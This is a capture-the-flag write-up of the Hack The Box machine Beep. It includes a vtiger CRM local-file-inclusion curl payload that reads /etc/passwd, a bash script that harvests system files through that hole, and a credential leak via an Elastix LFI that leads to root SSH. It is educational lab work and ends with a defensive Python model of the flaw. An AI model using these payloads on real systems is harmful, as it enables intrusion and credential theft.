Beep
Enumeration
Let's start out by enumerating the box and finding out what we are dealing with.
```
# Nmap 7.92 scan initiated Mon Jan 3 16:51:21 2022 as: nmap -sC -sV -oA nmap/scan -v 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.021s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: UIDL AUTH-RESP-CODE TOP USER IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES LOGIN-DELAY(0) APOP STLS EXPIRE(NEVER) PIPELINING
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed STARTTLS OK ATOMIC URLAUTHA0001 LITERAL+ MAILBOX-REFERRALS THREAD=REFERENCES RENAME LIST-SUBSCRIBED SORT LISTEXT MULTIAPPEND ID NO X-NETSCAPE THREAD=ORDEREDSUBJECT ANNOTATEMORE UIDPLUS UNSELECT CHILDREN IMAP4rev1 CATENATE SORT=MODSEQ IDLE RIGHTS=kxte BINARY ACL IMAP4 NAMESPACE QUOTA CONDSTORE
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_ssl-date: 2022-01-03T06:55:55+00:00; +1h01m05s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Elastix - Login page
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: 80DCC71362B27C7D0E608B0890C05E9F
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 1h01m04s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 3 16:57:54 2022 -- 1 IP address (1 host up) scanned in 393.30 seconds
```
There look to be quite a few ports open. Starting with HTTP on port 80, we get redirected to HTTPS on port 443 and are presented with an Elastix login screen.
Default credentials like admin:admin and admin:password don't work, so instead I move on to a gobuster scan to try to increase the attack surface.
Gobuster produced the following output. Among other things it identifies an /admin directory, and navigating to it I get presented with an authentication prompt.
```bash
gobuster dir -t 100 -u https://10.10.10.7 -x php -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words.txt -k -o gobuster
```

```
┌──(tom㉿acer-computer)-[~/htb/beep]
└─$ cat 10.10.10.7-gobuster
/.html (Status: 403) [Size: 283]
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/.htm (Status: 403) [Size: 282]
/.html.php (Status: 403) [Size: 287]
/.htm.php (Status: 403) [Size: 286]
/index.php (Status: 200) [Size: 1785]
/config.php (Status: 200) [Size: 1785]
/mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/. (Status: 200) [Size: 1785]
/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/.htaccess (Status: 403) [Size: 287]
/register.php (Status: 200) [Size: 1785]
/.htaccess.php (Status: 403) [Size: 291]
/images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/.htc (Status: 403) [Size: 282]
/.htc.php (Status: 403) [Size: 286]
/.html_var_DE (Status: 403) [Size: 290]
/.html_var_DE.php (Status: 403) [Size: 294]
/.htpasswd (Status: 403) [Size: 287]
/.htpasswd.php (Status: 403) [Size: 291]
/.html..php (Status: 403) [Size: 288]
/.html. (Status: 403) [Size: 284]
/.html.html.php (Status: 403) [Size: 292]
/.html.html (Status: 403) [Size: 288]
/recordings (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/.htpasswds (Status: 403) [Size: 288]
/.htpasswds.php (Status: 403) [Size: 292]
/.htm. (Status: 403) [Size: 283]
/.htm..php (Status: 403) [Size: 287]
/vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
<SNIP..>
```
/admin
Default credentials again do not work; I might try brute forcing later if I don't have success anywhere else. Hitting cancel sends us to /admin/config.php, which says we are unauthorised but still reports FreePBX 2.8.1.4, which looks like an information disclosure on this page.
/admin/config.php
Clicking on the Recordings tab takes us to yet another page.
This page says we are running FreePBX 2.5, which differs from the last page, which reported 2.8.1.4. Running gobuster against this page shows that a /modules directory exists, and navigating to it gives a listing of several PHP files.
/modules
Going back to the nmap scan, I notice another HTTP service listening on port 10000 (Webmin, MiniServ 1.570). Navigating to it presents yet another login page. After attempting to log in with default credentials, I get an error message saying that my IP has been blocked due to too many authentication failures.
Exploitation
With a lot of things to enumerate, I start by googling for exploits for FreePBX 2.8.1.4, as I don't have a version number for the Elastix instance on port 443. I find a Metasploit module, but running it against the server does not give a shell; Metasploit just reports that the exploit completed but no session was created. So, back to enumeration.
More enumeration
After reviewing the gobuster scan, the /vtigercrm result piques my interest. Navigating to this page shows yet another login page.
/vtigercrm
I notice the software name and version number in the bottom left and throw them into Google. I find an exploit on Exploit-DB for this vtiger CRM version, a local file inclusion, which works!
```
┌──(tom㉿acer-computer)-[~/htb/beep]
└─$ curl "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00" -k
root:x:0:0:root:/root:/bin/bash
<SNIP...>
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
<SNIP..>
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
<SNIP...>
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
<SNIP..>
spamfilter:x:500:500::/home/spamfilter:/bin/bash
<SNIP..>
fanis:x:501:501::/home/fanis:/bin/bash
```
From this we can identify two regular users with home directories, spamfilter (UID 500) and fanis (UID 501), alongside the asterisk service account.
Exploitation again
I attempted to use PHP filters to leak the website's source code, but I was unsuccessful. The only thing I was able to get was the user flag, by requesting:

```
sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
```

However, this feels like cheating, as I am not actually that user yet. I create the following bash script to retrieve useful files from the server.
```bash
#!/bin/bash
# Push every path in the LFI wordlist through the vtiger null-byte LFI and
# save any non-empty response to a file named after the path.
WORDLIST=/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
URL='https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php'

while read -r path; do
    [ -z "$path" ] && continue
    # -s: no progress output, -k: self-signed certificate; the trailing %00
    # truncates whatever suffix the script appends to the path
    contents=$(curl -sk "${URL}?module_name=../../../../../../../..${path}%00")

    # The original test used `echo $contents | wc -c`, which is never 0 because
    # echo always emits a newline; -n checks for an actual response body.
    if [ -n "$contents" ]; then
        printf '%s\n' "$contents" > "$(echo "$path" | tr '/' '_').txt"
    fi
done < "$WORDLIST"
```
The website's config files must be stored in a non-standard location, as the script did not retrieve any of them. At this point I refer to another walkthrough for a hint on where to go next.
Hint - Elastix exploit/help
Searchsploit shows both an LFI and an RCE exploit for Elastix, which look interesting. I start with the LFI, as I had success with that approach before. The LFI example pulls up a configuration file with usernames and passwords in it, giving me credentials for the asterisk user and the admin account. The password works and gets me into the admin portal.
I try to SSH into the machine as the asterisk user, with no success. I try as root and am successful, allowing me to grab the root flag. (One caveat: OpenSSH 4.3 only offers legacy key-exchange and host-key algorithms, so a current client may refuse to negotiate until they are re-enabled, e.g. with -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa.)
Review / Takeaways
After doing some research on the box, it turns out there are multiple ways of exploiting it. It's useful to always look for help documents on the machine, as they can tell you version numbers or dates. When I get stuck, I should always go back a step in my enumeration process and see if there was a result I missed or a result I was going to review but forgot.

The reason the PHP filters did not work was the position of the variable within the include path in the backend code, e.g.

```php
@include("include/language/$language.lang.php");
```

Even though $language was never sanitised, it comes after include/language/, so prepending a PHP filter just makes the path look like include/language/php://... . PHP only recognises a stream wrapper at the very start of a path, so that include resolves to nothing and shows nothing. Directory traversal still works because ../ is valid anywhere in a path, and the %00 truncates the .lang.php suffix. If, instead of include, the code used file_get_contents, it would return the contents of the file rather than executing it.
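As an added example (not code from the box, the write-up, or the vtiger/Elastix code base), the following Python models the include-path behaviour behind both the working curl request earlier and the takeaway above: why traversal plus %00 reaches /etc/passwd, why a php://filter payload goes nowhere once a directory prefix is hard-coded, and what a hardened version of the same lookup looks like. The prefix and suffix are taken from the snippet above; the web root and the language allowlist are assumptions.

```python
"""Model of the fixed-prefix include discussed above.

Vulnerable pattern (from the write-up):
    @include("include/language/$language.lang.php");

Two PHP behaviours decide what an attacker can reach through it:
  * on PHP older than 5.3.4 a NUL byte (%00 in the URL) truncates the path,
    discarding the ".lang.php" suffix;
  * stream wrappers such as php://filter are only recognised at the very
    start of a path, so they do nothing once a directory prefix is hard-coded.
"""
import posixpath

PREFIX = "include/language/"        # from the snippet above
SUFFIX = ".lang.php"
WEBROOT = "/var/www/html"           # assumed document root
ALLOWED_LANGS = {"en_us", "es_es"}  # assumed set of shipped language files


def effective_include_path(user_value, nul_truncates=True):
    """Return the path string PHP would actually hand to include().

    nul_truncates=True models PHP < 5.3.4; on newer PHP a NUL byte in the
    path makes include() fail instead, modelled here with ValueError.
    """
    raw = PREFIX + user_value + SUFFIX
    if "\x00" in raw:
        if not nul_truncates:
            raise ValueError("include(): NUL byte in path")
        raw = raw.split("\x00", 1)[0]
    return raw


def classify(user_value, nul_truncates=True):
    """Say what the include would load: ("wrapper", path) for a stream
    wrapper, ("traversal", path) for a file outside the web root,
    ("local", path) for a file inside it, or ("rejected", "") when PHP
    refuses the path outright."""
    try:
        path = effective_include_path(user_value, nul_truncates)
    except ValueError:
        return ("rejected", "")
    if path.startswith("php://"):
        return ("wrapper", path)
    # posixpath.normpath stands in for filesystem path resolution here: it
    # collapses '..' and, for absolute paths, clamps at '/'.
    full = posixpath.normpath(posixpath.join(WEBROOT, path))
    if full.startswith(WEBROOT + "/"):
        return ("local", full)
    return ("traversal", full)


def safe_language_path(user_value):
    """Hardened replacement: allowlist the value, then still confine the
    resolved path to the language directory (defence in depth). Real code
    would use realpath() on the existing file instead of normpath()."""
    if user_value not in ALLOWED_LANGS:
        raise ValueError("unknown language %r" % user_value)
    base = posixpath.normpath(posixpath.join(WEBROOT, PREFIX))
    full = posixpath.normpath(posixpath.join(base, user_value + SUFFIX))
    if not full.startswith(base + "/"):
        raise ValueError("path escapes language directory")
    return full


def rejected_by_hardened_version(user_value):
    """True if safe_language_path() refuses the value."""
    try:
        safe_language_path(user_value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    traversal = "../../../../../../../../etc/passwd"
    flt = "php://filter/convert.base64-encode/resource=config.php"
    print("traversal + NUL       ->", classify(traversal + "\x00"))
    print("traversal, no NUL     ->", classify(traversal))
    print("php://filter + NUL    ->", classify(flt + "\x00"))
    print("same, modern PHP      ->", classify(flt + "\x00", nul_truncates=False))
    print("hardened, en_us       ->", safe_language_path("en_us"))
    print("hardened rejects LFI  ->", rejected_by_hardened_version(traversal + "\x00"))
```

Run stand-alone it prints the classification of each payload; the php://filter case lands on a nonsense file under include/language/ rather than on a wrapper, which is exactly why the source-code leak failed, while the traversal case with a NUL byte resolves to /etc/passwd.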
I should have also checked the server for any ssh keys as that could have been an easy win.
Author: Thomas Karbowiak